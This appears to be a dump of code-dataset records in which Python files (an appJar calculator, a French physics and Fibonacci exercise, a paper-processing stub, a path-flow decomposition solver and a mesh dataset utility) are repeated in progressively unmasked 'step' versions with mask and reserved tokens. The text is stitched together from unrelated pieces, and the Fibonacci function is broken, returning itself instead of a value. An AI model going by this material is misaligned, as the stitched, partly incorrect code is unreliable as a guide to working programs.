btn == 'Multiply':\n calc = 'm'\n if btn == 'Divide':\n calc = 'd'\n 
app.clearEntry('Number')\n\n\ndef calculate(btn):\n global result, n1, n2, isFirst, calc\n inputNumber()\n if calc == 'a':\n result = n1 + n2\n if calc == 's':\n result = n1 - n2\n if calc == 'm':\n result = n1 * n2\n if calc == 'd':\n try:\n result = n1 / n2\n except ZeroDivisionError:\n clearOut(btn)\n app.errorBox('DivisionByZero', \"You can't divide by Zero.\")\n app.clearEntry('Number')\n app.setLabel('Result', result)\n\n\ndef clearOut(btn):\n global result, n1, n2, isFirst, calc\n n1, n2 = 0.0, 0.0\n result = 0.0\n isFirst = True\n calc = ''\n\n\ndef inputNumber():\n global n1, n2, isFirst\n if isFirst:\n n1 = app.getEntry('Number')\n isFirst = False\n else:\n n2 = app.getEntry('Number')\n isFirst = True\n\n\napp.setStretch('column')\napp.setSticky('')\napp.setResizable(True)\napp.addNumericEntry('Number')\napp.setEntryDefault('Number', 'Enter Number')\napp.addButtons(['Add', 'Substract', 'Multiply', 'Divide'], doMath)\napp.addButtons(['Calculate!', 'clearOut'], [calculate, clearOut])\napp.setButton('clearOut', 'C')\napp.addEmptyLabel('Result')\napp.go()\n", "step-5": "from appJar import gui\n\napp = gui(\"Calculator\", \"560x240\")\n\n### FUNCTIONS ###\n\nn1, n2 = 0.0, 0.0\nresult = 0.0\nisFirst = True\ncalc = \"\"\n\ndef doMath(btn):\n global result, n1, n2, isFirst, calc\n\n inputNumber()\n\n if(btn == \"Add\"): calc = \"a\"\n if(btn == \"Substract\"): calc = \"s\"\n if(btn == \"Multiply\"): calc = \"m\"\n if(btn == \"Divide\"): calc = \"d\"\n\n app.clearEntry(\"Number\")\n\ndef calculate(btn):\n global result, n1, n2, isFirst, calc\n\n inputNumber()\n\n if(calc == 'a'): result = n1 + n2\n if(calc == 's'): result = n1 - n2\n if(calc == 'm'): result = n1 * n2\n if(calc == 'd'):\n try:\n result = n1 / n2\n except ZeroDivisionError:\n clearOut(btn)\n app.errorBox(\"DivisionByZero\", \"You can't divide by Zero.\")\n\n app.clearEntry(\"Number\")\n app.setLabel(\"Result\", result)\n\ndef clearOut(btn):\n global result, n1, n2, isFirst, calc\n n1, n2 = 0.0, 
0.0\n result = 0.0\n isFirst = True\n calc = \"\"\n\ndef inputNumber():\n global n1, n2, isFirst\n\n if(isFirst):\n n1 = app.getEntry(\"Number\")\n isFirst = False\n else:\n n2 = app.getEntry(\"Number\")\n isFirst = True\n\n\n### FUNCTIONS ###\n\napp.setStretch(\"column\")\napp.setSticky(\"\")\napp.setResizable(True)\napp.addNumericEntry(\"Number\")\napp.setEntryDefault(\"Number\", \"Enter Number\")\n\napp.addButtons([\"Add\", \"Substract\", \"Multiply\", \"Divide\"], doMath)\napp.addButtons([\"Calculate!\", \"clearOut\"], [calculate, clearOut])\napp.setButton(\"clearOut\", \"C\")\n\napp.addEmptyLabel(\"Result\")\n\napp.go()\n", "step-ids": [ 3, 5, 6, 7, 8 ] }
[ 3, 5, 6, 7, 8 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def fibonaci(n): for i in range(0, n): j = 1 i = i + j j = i return fibonaci <|reserved_special_token_1|> def ep(m, h, el, g=9.8): E = m * h * g if E < el: print('le plus grand est : el') else: print('le plus grand est : E') <|reserved_special_token_0|> def fibonaci(n): for i in range(0, n): j = 1 i = i + j j = i return fibonaci <|reserved_special_token_1|> def ep(m, h, el, g=9.8): E = m * h * g if E < el: print('le plus grand est : el') else: print('le plus grand est : E') ep(3, 4, 5) def fibonaci(n): for i in range(0, n): j = 1 i = i + j j = i return fibonaci <|reserved_special_token_1|> # fonction pour voir quel est le plus grand entre l'energie limite et l'enerve potentiel def ep (m,h,el,g=9.8): E=m*h*g if E<el: print ("le plus grand est : el") else: print ("le plus grand est : E") ep(3,4,5) #fontion fibonaci 0 1 1 2 3 5 8 13 def fibonaci(n): for i in range(0,n,): j= 1 i = i + j j=i return fibonaci
flexible
{ "blob_id": "869284fa531a93c1b9812ed90a560d0bb2f87e97", "index": 255, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef fibonaci(n):\n for i in range(0, n):\n j = 1\n i = i + j\n j = i\n return fibonaci\n", "step-3": "def ep(m, h, el, g=9.8):\n E = m * h * g\n if E < el:\n print('le plus grand est : el')\n else:\n print('le plus grand est : E')\n\n\n<mask token>\n\n\ndef fibonaci(n):\n for i in range(0, n):\n j = 1\n i = i + j\n j = i\n return fibonaci\n", "step-4": "def ep(m, h, el, g=9.8):\n E = m * h * g\n if E < el:\n print('le plus grand est : el')\n else:\n print('le plus grand est : E')\n\n\nep(3, 4, 5)\n\n\ndef fibonaci(n):\n for i in range(0, n):\n j = 1\n i = i + j\n j = i\n return fibonaci\n", "step-5": "# fonction pour voir quel est le plus grand entre l'energie limite et l'enerve potentiel\ndef ep (m,h,el,g=9.8):\n E=m*h*g\n if E<el:\n print (\"le plus grand est : el\")\n else:\n print (\"le plus grand est : E\")\n\nep(3,4,5)\n\n#fontion fibonaci 0 1 1 2 3 5 8 13\n\ndef fibonaci(n):\n for i in range(0,n,):\n j= 1\n i = i + j\n j=i\n return fibonaci\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from paper_processor import PaperProcessor import logging logging.basicConfig( level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s') q = "levamisole inhibitor" p = PaperProcessor(q)
normal
{ "blob_id": "96e64b715dbfc1c59ba44d608ad2694b165017b5", "index": 1975, "step-1": "<mask token>\n", "step-2": "<mask token>\nlogging.basicConfig(level=logging.DEBUG, format=\n '%(asctime)s - %(levelname)s - %(message)s')\n<mask token>\n", "step-3": "<mask token>\nlogging.basicConfig(level=logging.DEBUG, format=\n '%(asctime)s - %(levelname)s - %(message)s')\nq = 'levamisole inhibitor'\np = PaperProcessor(q)\n", "step-4": "from paper_processor import PaperProcessor\nimport logging\nlogging.basicConfig(level=logging.DEBUG, format=\n '%(asctime)s - %(levelname)s - %(message)s')\nq = 'levamisole inhibitor'\np = PaperProcessor(q)\n", "step-5": "from paper_processor import PaperProcessor\nimport logging\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s - %(levelname)s - %(message)s')\nq = \"levamisole inhibitor\"\np = PaperProcessor(q)\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
#! /usr/bin/env python3
#
# This file is part of Toboggan, https://github.com/TheoryInPractice/Toboggan/,
# and is Copyright (C) North Carolina State University, 2017. It is licensed
# under the three-clause BSD license; see LICENSE.
#
# -*- coding: utf-8 -*-

# python libs
import sys
import itertools
# local imports
from toboggan.dp import solve as solve_dp


def print_progress(iteration, total, prefix='', suffix='', decimals=1,
                   bar_length=100):
    """
    Call in a loop to create a terminal progress bar.

    @params:
        iteration   - Required  : current iteration (Int)
        total       - Required  : total iterations (Int)
        prefix      - Optional  : prefix string (Str)
        suffix      - Optional  : suffix string (Str)
        decimals    - Optional  : positive number of decimals in percent
                                  complete (Int)
        bar_length  - Optional  : character length of bar (Int)
    """
    str_format = "{0:." + str(decimals) + "f}"
    percents = str_format.format(100 * (iteration / float(total)))
    filled_length = int(round(bar_length * iteration / float(total)))
    bar = '█' * filled_length + '-' * (bar_length - filled_length)

    # '\r' rewrites the same terminal line on every call.  (Fixed: a stray
    # trailing comma here used to build and discard a one-element tuple --
    # a Python-2 `print` leftover with no effect in Python 3.)
    sys.stdout.write('\r%s |%s| %s%s %s' %
                     (prefix, bar, percents, '%', suffix))

    if iteration == total:
        sys.stdout.write('\n')
    sys.stdout.flush()


def is_feasible(weights, flow, max_weight):
    """Test whether set of guessed weights is feasible.

    `weights` is a sorted, length-k list in which unguessed entries are
    None.  Each None is bounded below by the nearest guessed value to its
    left (or 1) and above by the nearest guessed value to its right (or
    `max_weight`); the guess is feasible iff `flow` lies between the
    resulting minimum and maximum possible weight sums.

    NOTE(review): the `if ... else` propagation relies on truthiness, so it
    assumes all guessed weights are positive (a guessed 0 would be treated
    like None) -- confirm against how weights are produced upstream.
    """
    # In the following, we replace every occurrence of 'None' in the
    # weight-array by the minimum/maximum possible value (given by the
    # last/the first non-None value next to it).  The forward pass over
    # `min_weights` fills minima; running the same loop over the reversed
    # list with `max_weight` as sentinel fills maxima.
    min_weights = [1] + weights
    max_weights = [max_weight] + list(reversed(weights))
    for i in range(1, len(min_weights)):
        min_weights[i] = min_weights[i] if min_weights[i] else min_weights[i-1]
        max_weights[i] = max_weights[i] if max_weights[i] else max_weights[i-1]
    min_weights = min_weights[1:]
    max_weights = list(reversed(max_weights[1:]))

    # If the flow value lies outside of the sum-of-weight estimates,
    # the current guessed set of weights is infeasible.
    return sum(min_weights) <= flow and sum(max_weights) >= flow


def solve(instance, silent=True, max_weight_lower=1,
          max_weight_upper=float('inf'), scoring="sink distance"):
    """Solve the provided instance of path-flow decomposition.

    Strategy: guess progressively smaller subsets of the k path weights
    (drawn from edge weights occurring in the instance), prune infeasible
    guesses with `is_feasible`, and hand each surviving guess to the DP
    solver; the first guess that yields solutions wins.

    Returns a set of solutions, or the empty set when the instance admits
    no decomposition.  `max_weight_lower`, `max_weight_upper` and
    `scoring` are accepted for interface compatibility but are currently
    unused by this implementation.
    """
    flow = instance.flow
    k = instance.k

    # quit right away if the instance has weight bounds that can't be
    # satisfied
    if instance.has_bad_bounds():
        return set()

    # if k equals the size of the largest edge cut, the weights are
    # predetermined
    if instance.k == max(len(C) for C in instance.edge_cuts):
        largest_cut = max(instance.edge_cuts, key=len)
        # Important: path weights must be sorted, otherwise our
        # subsequent optimizations will remove this constraint.
        weights = list(sorted(w for _, w in largest_cut))
        return solve_dp(instance, silent=True, guessed_weights=weights)

    max_weight = instance.max_weight_bounds[1]
    feasible_weights = list(filter(lambda w: w <= max_weight,
                                   instance.weights))
    if not silent:
        print(instance.weights, feasible_weights)

    # figure out whether we get the first or last positions for free
    largest_free = False
    smallest_free = False
    # check largest weight first
    if instance.max_weight_bounds[0] == instance.max_weight_bounds[1]:
        largest_free = True
        largest = instance.max_weight_bounds[0]
    if min(instance.weights) == 1:
        smallest_free = True
        smallest = 1

    # index positions that still need a guessed weight (free endpoints are
    # excluded from the combinatorial search)
    positions = list(range(int(smallest_free), k - int(largest_free)))

    # iterate over the number of unguessed weights
    for diff in range(k + 1):
        if not silent:
            print("Diff =", diff)
        # iterate over positions of guessed weights.  We want them to be
        # ordered, but choose the smallest first to be removed
        for rev_indices in itertools.combinations(reversed(positions),
                                                  k - diff):
            indices = list(reversed(rev_indices))
            p = len(indices)
            # when k-1 values are determined, it also determines the kth
            # value
            if p == k - 1:
                continue
            # iterate over choices for those guessed weights
            for chosen_weights in itertools.combinations(feasible_weights,
                                                         p):
                weights = [None] * k
                # assign the chosen weights to the guessed positions
                for p, w in zip(indices, chosen_weights):
                    weights[p] = w
                # add in free values
                if smallest_free:
                    weights[0] = smallest
                if largest_free:
                    weights[k - 1] = largest
                # quit if this didn't work
                if not is_feasible(weights, flow, max_weight):
                    continue
                if not silent:
                    print("Trying weights", weights)
                sol = solve_dp(instance, silent=True,
                               guessed_weights=weights)
                if len(sol) > 0:
                    if not silent:
                        try:
                            for s in sol:
                                print(s, sum(s.path_weights), flow)
                        except AttributeError:
                            print("Underdetermined solution")
                    return sol

    # Exhausted every guess without the DP finding a decomposition.  Return
    # the empty set for consistency with the bad-bounds early exit above
    # (previously this path fell through and implicitly returned None).
    return set()
normal
{ "blob_id": "1b4c9841fd10d065983974e93fe5dcbe048c1281", "index": 4180, "step-1": "<mask token>\n\n\ndef is_feasible(weights, flow, max_weight):\n \"\"\"Test whether set of guessed weights is feasible.\"\"\"\n min_weights = [1] + weights\n max_weights = [max_weight] + list(reversed(weights))\n for i in range(1, len(min_weights)):\n min_weights[i] = min_weights[i] if min_weights[i] else min_weights[\n i - 1]\n max_weights[i] = max_weights[i] if max_weights[i] else max_weights[\n i - 1]\n min_weights = min_weights[1:]\n max_weights = list(reversed(max_weights[1:]))\n return sum(min_weights) <= flow and sum(max_weights) >= flow\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef is_feasible(weights, flow, max_weight):\n \"\"\"Test whether set of guessed weights is feasible.\"\"\"\n min_weights = [1] + weights\n max_weights = [max_weight] + list(reversed(weights))\n for i in range(1, len(min_weights)):\n min_weights[i] = min_weights[i] if min_weights[i] else min_weights[\n i - 1]\n max_weights[i] = max_weights[i] if max_weights[i] else max_weights[\n i - 1]\n min_weights = min_weights[1:]\n max_weights = list(reversed(max_weights[1:]))\n return sum(min_weights) <= flow and sum(max_weights) >= flow\n\n\ndef solve(instance, silent=True, max_weight_lower=1, max_weight_upper=float\n ('inf'), scoring='sink distance'):\n \"\"\"Solve the provided instance of path-flow decomposition.\"\"\"\n flow = instance.flow\n k = instance.k\n if instance.has_bad_bounds():\n return set()\n if instance.k == max(len(C) for C in instance.edge_cuts):\n largest_cut = max(instance.edge_cuts, key=len)\n weights = list(sorted(w for _, w in largest_cut))\n return solve_dp(instance, silent=True, guessed_weights=weights)\n max_weight = instance.max_weight_bounds[1]\n feasible_weights = list(filter(lambda w: w <= max_weight, instance.weights)\n )\n if not silent:\n print(instance.weights, feasible_weights)\n largest_free = False\n smallest_free = False\n if instance.max_weight_bounds[0] == 
instance.max_weight_bounds[1]:\n largest_free = True\n largest = instance.max_weight_bounds[0]\n if min(instance.weights) == 1:\n smallest_free = True\n smallest = 1\n positions = list(range(int(smallest_free), k - int(largest_free)))\n for diff in range(k + 1):\n if not silent:\n print('Diff =', diff)\n for rev_indices in itertools.combinations(reversed(positions), k - diff\n ):\n indices = list(reversed(rev_indices))\n p = len(indices)\n if p == k - 1:\n continue\n for chosen_weights in itertools.combinations(feasible_weights, p):\n weights = [None] * k\n for p, w in zip(indices, chosen_weights):\n weights[p] = w\n if smallest_free:\n weights[0] = smallest\n if largest_free:\n weights[k - 1] = largest\n if not is_feasible(weights, flow, max_weight):\n continue\n if not silent:\n print('Trying weights', weights)\n sol = solve_dp(instance, silent=True, guessed_weights=weights)\n if len(sol) > 0:\n if not silent:\n try:\n for s in sol:\n print(s, sum(s.path_weights), flow)\n except AttributeError:\n print('Unterdetermined solution')\n return sol\n", "step-3": "<mask token>\n\n\ndef print_progress(iteration, total, prefix='', suffix='', decimals=1,\n bar_length=100):\n \"\"\"\n Call in a loop to create terminal progress bar.\n\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent\n complete (Int)\n bar_length - Optional : character length of bar (Int)\n \"\"\"\n str_format = '{0:.' 
+ str(decimals) + 'f}'\n percents = str_format.format(100 * (iteration / float(total)))\n filled_length = int(round(bar_length * iteration / float(total)))\n bar = '█' * filled_length + '-' * (bar_length - filled_length)\n sys.stdout.write('\\r%s |%s| %s%s %s' % (prefix, bar, percents, '%', suffix)\n ),\n if iteration == total:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\n\ndef is_feasible(weights, flow, max_weight):\n \"\"\"Test whether set of guessed weights is feasible.\"\"\"\n min_weights = [1] + weights\n max_weights = [max_weight] + list(reversed(weights))\n for i in range(1, len(min_weights)):\n min_weights[i] = min_weights[i] if min_weights[i] else min_weights[\n i - 1]\n max_weights[i] = max_weights[i] if max_weights[i] else max_weights[\n i - 1]\n min_weights = min_weights[1:]\n max_weights = list(reversed(max_weights[1:]))\n return sum(min_weights) <= flow and sum(max_weights) >= flow\n\n\ndef solve(instance, silent=True, max_weight_lower=1, max_weight_upper=float\n ('inf'), scoring='sink distance'):\n \"\"\"Solve the provided instance of path-flow decomposition.\"\"\"\n flow = instance.flow\n k = instance.k\n if instance.has_bad_bounds():\n return set()\n if instance.k == max(len(C) for C in instance.edge_cuts):\n largest_cut = max(instance.edge_cuts, key=len)\n weights = list(sorted(w for _, w in largest_cut))\n return solve_dp(instance, silent=True, guessed_weights=weights)\n max_weight = instance.max_weight_bounds[1]\n feasible_weights = list(filter(lambda w: w <= max_weight, instance.weights)\n )\n if not silent:\n print(instance.weights, feasible_weights)\n largest_free = False\n smallest_free = False\n if instance.max_weight_bounds[0] == instance.max_weight_bounds[1]:\n largest_free = True\n largest = instance.max_weight_bounds[0]\n if min(instance.weights) == 1:\n smallest_free = True\n smallest = 1\n positions = list(range(int(smallest_free), k - int(largest_free)))\n for diff in range(k + 1):\n if not silent:\n print('Diff =', diff)\n for 
rev_indices in itertools.combinations(reversed(positions), k - diff\n ):\n indices = list(reversed(rev_indices))\n p = len(indices)\n if p == k - 1:\n continue\n for chosen_weights in itertools.combinations(feasible_weights, p):\n weights = [None] * k\n for p, w in zip(indices, chosen_weights):\n weights[p] = w\n if smallest_free:\n weights[0] = smallest\n if largest_free:\n weights[k - 1] = largest\n if not is_feasible(weights, flow, max_weight):\n continue\n if not silent:\n print('Trying weights', weights)\n sol = solve_dp(instance, silent=True, guessed_weights=weights)\n if len(sol) > 0:\n if not silent:\n try:\n for s in sol:\n print(s, sum(s.path_weights), flow)\n except AttributeError:\n print('Unterdetermined solution')\n return sol\n", "step-4": "import sys\nimport itertools\nfrom toboggan.dp import solve as solve_dp\n\n\ndef print_progress(iteration, total, prefix='', suffix='', decimals=1,\n bar_length=100):\n \"\"\"\n Call in a loop to create terminal progress bar.\n\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent\n complete (Int)\n bar_length - Optional : character length of bar (Int)\n \"\"\"\n str_format = '{0:.' 
+ str(decimals) + 'f}'\n percents = str_format.format(100 * (iteration / float(total)))\n filled_length = int(round(bar_length * iteration / float(total)))\n bar = '█' * filled_length + '-' * (bar_length - filled_length)\n sys.stdout.write('\\r%s |%s| %s%s %s' % (prefix, bar, percents, '%', suffix)\n ),\n if iteration == total:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\n\ndef is_feasible(weights, flow, max_weight):\n \"\"\"Test whether set of guessed weights is feasible.\"\"\"\n min_weights = [1] + weights\n max_weights = [max_weight] + list(reversed(weights))\n for i in range(1, len(min_weights)):\n min_weights[i] = min_weights[i] if min_weights[i] else min_weights[\n i - 1]\n max_weights[i] = max_weights[i] if max_weights[i] else max_weights[\n i - 1]\n min_weights = min_weights[1:]\n max_weights = list(reversed(max_weights[1:]))\n return sum(min_weights) <= flow and sum(max_weights) >= flow\n\n\ndef solve(instance, silent=True, max_weight_lower=1, max_weight_upper=float\n ('inf'), scoring='sink distance'):\n \"\"\"Solve the provided instance of path-flow decomposition.\"\"\"\n flow = instance.flow\n k = instance.k\n if instance.has_bad_bounds():\n return set()\n if instance.k == max(len(C) for C in instance.edge_cuts):\n largest_cut = max(instance.edge_cuts, key=len)\n weights = list(sorted(w for _, w in largest_cut))\n return solve_dp(instance, silent=True, guessed_weights=weights)\n max_weight = instance.max_weight_bounds[1]\n feasible_weights = list(filter(lambda w: w <= max_weight, instance.weights)\n )\n if not silent:\n print(instance.weights, feasible_weights)\n largest_free = False\n smallest_free = False\n if instance.max_weight_bounds[0] == instance.max_weight_bounds[1]:\n largest_free = True\n largest = instance.max_weight_bounds[0]\n if min(instance.weights) == 1:\n smallest_free = True\n smallest = 1\n positions = list(range(int(smallest_free), k - int(largest_free)))\n for diff in range(k + 1):\n if not silent:\n print('Diff =', diff)\n for 
rev_indices in itertools.combinations(reversed(positions), k - diff\n ):\n indices = list(reversed(rev_indices))\n p = len(indices)\n if p == k - 1:\n continue\n for chosen_weights in itertools.combinations(feasible_weights, p):\n weights = [None] * k\n for p, w in zip(indices, chosen_weights):\n weights[p] = w\n if smallest_free:\n weights[0] = smallest\n if largest_free:\n weights[k - 1] = largest\n if not is_feasible(weights, flow, max_weight):\n continue\n if not silent:\n print('Trying weights', weights)\n sol = solve_dp(instance, silent=True, guessed_weights=weights)\n if len(sol) > 0:\n if not silent:\n try:\n for s in sol:\n print(s, sum(s.path_weights), flow)\n except AttributeError:\n print('Unterdetermined solution')\n return sol\n", "step-5": "#! /usr/bin/env python3\n#\n# This file is part of Toboggan, https://github.com/TheoryInPractice/Toboggan/,\n# and is Copyright (C) North Carolina State University, 2017. It is licensed\n# under the three-clause BSD license; see LICENSE.\n#\n# -*- coding: utf-8 -*-\n# python libs\nimport sys\nimport itertools\n# local imports\nfrom toboggan.dp import solve as solve_dp\n\n\n# Print iterations progress\ndef print_progress(iteration, total, prefix='', suffix='', decimals=1,\n bar_length=100):\n \"\"\"\n Call in a loop to create terminal progress bar.\n\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent\n complete (Int)\n bar_length - Optional : character length of bar (Int)\n \"\"\"\n str_format = \"{0:.\" + str(decimals) + \"f}\"\n percents = str_format.format(100 * (iteration / float(total)))\n filled_length = int(round(bar_length * iteration / float(total)))\n bar = '█' * filled_length + '-' * (bar_length - filled_length)\n\n sys.stdout.write('\\r%s |%s| %s%s %s' % (prefix, bar, percents, '%',\n suffix)),\n\n if 
iteration == total:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\n\ndef is_feasible(weights, flow, max_weight):\n \"\"\"Test whether set of guessed weights is feasible.\"\"\"\n # In the following, we replace very occurenve of 'None' in the\n # weight-array by the minimum/maximum possible value (given by the\n # last/the first\n # non-None value next to it).\n min_weights = [1] + weights\n max_weights = [max_weight] + list(reversed(weights))\n for i in range(1, len(min_weights)):\n min_weights[i] = min_weights[i] if min_weights[i] else min_weights[i-1]\n max_weights[i] = max_weights[i] if max_weights[i] else max_weights[i-1]\n min_weights = min_weights[1:]\n max_weights = list(reversed(max_weights[1:]))\n\n # If the flow value lies outside of the sum-of-weight estimates,\n # the current guessed set of weights is infeasible.\n return sum(min_weights) <= flow and sum(max_weights) >= flow\n\n\ndef solve(instance, silent=True, max_weight_lower=1,\n max_weight_upper=float('inf'), scoring=\"sink distance\"):\n \"\"\"Solve the provided instance of path-flow decomposition.\"\"\"\n flow = instance.flow\n k = instance.k\n\n # quit right away if the instance has weight bounds that can't be satisfied\n if instance.has_bad_bounds():\n return set()\n\n # if k equals the size of the largest edge cut, the weights are\n # predetermined\n if instance.k == max(len(C) for C in instance.edge_cuts):\n largest_cut = max(instance.edge_cuts, key=len)\n # Important: path weights must be sorted, otherwise our\n # subsequent optimizations will remove this constraint.\n weights = list(sorted(w for _, w in largest_cut))\n return solve_dp(instance, silent=True, guessed_weights=weights)\n\n max_weight = instance.max_weight_bounds[1]\n feasible_weights = list(filter(lambda w: w <= max_weight,\n instance.weights))\n\n if not silent:\n print(instance.weights, feasible_weights)\n\n # figure out whether we get the first or last positions for free\n largest_free = False\n smallest_free = False\n # 
check largest weight first\n if instance.max_weight_bounds[0] == instance.max_weight_bounds[1]:\n largest_free = True\n largest = instance.max_weight_bounds[0]\n if min(instance.weights) == 1:\n smallest_free = True\n smallest = 1\n\n positions = list(range(int(smallest_free), k-int(largest_free)))\n\n # iterate over the number of unguessed weights\n for diff in range(k+1):\n if not silent:\n print(\"Diff =\", diff)\n # iterate over positions of guessed weights. We want them to be\n # ordered, but choose the smallest first to be removed\n for rev_indices in itertools.combinations(reversed(positions), k-diff):\n indices = list(reversed(rev_indices))\n p = len(indices)\n # when k-1 values are determined, it also determines the kth value\n if p == k-1:\n continue\n # iterate over choices for those guessed weights\n for chosen_weights in itertools.combinations(feasible_weights, p):\n weights = [None] * k\n\n # assign the chosen weights to the guessed positions\n for p, w in zip(indices, chosen_weights):\n weights[p] = w\n\n # add in free values\n if smallest_free:\n weights[0] = smallest\n if largest_free:\n weights[k-1] = largest\n\n # quit if this didn't work\n if not is_feasible(weights, flow, max_weight):\n continue\n\n if not silent:\n print(\"Trying weights\", weights)\n sol = solve_dp(instance, silent=True, guessed_weights=weights)\n if len(sol) > 0:\n if not silent:\n try:\n for s in sol:\n print(s, sum(s.path_weights), flow)\n except AttributeError:\n print(\"Unterdetermined solution\")\n return sol\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
__doc__ = """ Dataset Module Utilities - mostly for handling files and datasets """ import glob import os import random from meshparty import mesh_io # Datasets ----------------------- SVEN_BASE = "seungmount/research/svenmd" NICK_BASE = "seungmount/research/Nick/" BOTH_BASE = "seungmount/research/nick_and_sven" DATASET_DIRS = { "orig_full_cells": [f"{SVEN_BASE}/pointnet_axoness_gt_180223/"], "soma_vs_rest": [f"{SVEN_BASE}/pointnet_soma_masked_180401"], "orphans": [f"{SVEN_BASE}/pointnet_orphan_axons_gt_180308/", f"{SVEN_BASE}/pointnet_orphan_dendrites_gt_180308/"], "orphans2": [f"{NICK_BASE}/pointnet/orphan_dataset/train_val_axons", f"{NICK_BASE}/pointnet/orphan_dataset/train_val_dends/"], "orphan_axons": [f"{SVEN_BASE}/pointnet_orphan_axons_gt_180308/"], "orphan_axons_refined": [(f"{SVEN_BASE}" "/pointnet_orphan_axons_gt_180308_refined/")], "pinky100_orphan_dends": [(f"{BOTH_BASE}/data/180920_orphan_dends/")], "orphan_axons_pinky100": [(f"{SVEN_BASE}/InhAnalysis/meshes_put_axon/")], "fish_refined": [f"{SVEN_BASE}/180831_meshes_ashwin_refined/"], "full_cells_unrefined": [(f"{SVEN_BASE}" "/pointnet_full_semantic_labels" "_masked_180401")], "full_cells_refined": [(f"{SVEN_BASE}" "/pointnet_full_semantic_labels" "_masked_180401_refined/")], "pinky100_orphan_dend_features": [(f"{BOTH_BASE}" "/nick_archive/p100_dend_outer" "/inference/proj32/")], "pinky100_orphan_dend_features_32": [(f"{BOTH_BASE}" "/nick_archive/p100_dend_outer_32" "/inference/")], "default": [f"{SVEN_BASE}/pointnet_axoness_gt_rfc_based_masked_180322/", f"{SVEN_BASE}/pointnet_orphan_axons_gt_180308/", f"{SVEN_BASE}/pointnet_orphan_dendrites_gt_180308/"] } # -------------------------------- def fetch_dset_dirs(dset_name=None): """ Finds the global pathname to a list of directories which represent a dataset by name. 
""" assert (dset_name is None) or (dset_name in DATASET_DIRS), "invalid name" dset_name = "default" if dset_name is None else dset_name home = os.path.expanduser("~") return list(os.path.join(home, d) for d in DATASET_DIRS[dset_name]) def files_from_dir(dirname, exts=["obj", "h5"]): """ Searches a directory for a set of extensions and returns the files matching those extensions, sorted by basename """ filenames = list() for ext in exts: ext_expr = os.path.join(dirname, f"*.{ext}") filenames.extend(glob.glob(ext_expr)) return sorted(filenames, key=os.path.basename) def split_files(filenames, train_split=0.8, val_split=0.1, test_split=0.1, seed=None): if seed is not None: random.seed(seed) # Normalizing splits for arbitrary values total = train_split + val_split + test_split train_split = train_split / total val_split = val_split / total test_split = test_split / total n_train = round(train_split * len(filenames)) n_val = round(val_split * len(filenames)) permutation = random.sample(filenames, len(filenames)) train_files = permutation[:n_train] val_files = permutation[n_train:(n_train+n_val)] test_files = permutation[(n_train+n_val):] return train_files, val_files, test_files # Helper functions for testing (e.g. sample.py) def pull_n_samples(dset, n): """Pulls n random samples from a dataset object""" return list(dset[i] for i in random.sample(range(len(dset)), n)) def save_samples(samples, output_prefix="sample"): """Saves a list of samples to ply files (with h5 labels)""" for (i, vertices) in enumerate(samples): vertex_fname = "{pref}{i}_vertices.ply".format(pref=output_prefix, i=i) if os.path.dirname(vertex_fname) == "": vertex_fname = "./" + vertex_fname mesh_io.Mesh.write_vertices_ply(None, vertex_fname, coords=vertices)
normal
{ "blob_id": "fd0db093b72dad4657d71788405fcca4ba55daff", "index": 8529, "step-1": "<mask token>\n\n\ndef fetch_dset_dirs(dset_name=None):\n \"\"\"\n Finds the global pathname to a list of directories which represent a\n dataset by name.\n \"\"\"\n assert dset_name is None or dset_name in DATASET_DIRS, 'invalid name'\n dset_name = 'default' if dset_name is None else dset_name\n home = os.path.expanduser('~')\n return list(os.path.join(home, d) for d in DATASET_DIRS[dset_name])\n\n\n<mask token>\n\n\ndef split_files(filenames, train_split=0.8, val_split=0.1, test_split=0.1,\n seed=None):\n if seed is not None:\n random.seed(seed)\n total = train_split + val_split + test_split\n train_split = train_split / total\n val_split = val_split / total\n test_split = test_split / total\n n_train = round(train_split * len(filenames))\n n_val = round(val_split * len(filenames))\n permutation = random.sample(filenames, len(filenames))\n train_files = permutation[:n_train]\n val_files = permutation[n_train:n_train + n_val]\n test_files = permutation[n_train + n_val:]\n return train_files, val_files, test_files\n\n\n<mask token>\n\n\ndef save_samples(samples, output_prefix='sample'):\n \"\"\"Saves a list of samples to ply files (with h5 labels)\"\"\"\n for i, vertices in enumerate(samples):\n vertex_fname = '{pref}{i}_vertices.ply'.format(pref=output_prefix, i=i)\n if os.path.dirname(vertex_fname) == '':\n vertex_fname = './' + vertex_fname\n mesh_io.Mesh.write_vertices_ply(None, vertex_fname, coords=vertices)\n", "step-2": "<mask token>\n\n\ndef fetch_dset_dirs(dset_name=None):\n \"\"\"\n Finds the global pathname to a list of directories which represent a\n dataset by name.\n \"\"\"\n assert dset_name is None or dset_name in DATASET_DIRS, 'invalid name'\n dset_name = 'default' if dset_name is None else dset_name\n home = os.path.expanduser('~')\n return list(os.path.join(home, d) for d in DATASET_DIRS[dset_name])\n\n\ndef files_from_dir(dirname, exts=['obj', 'h5']):\n \"\"\"\n 
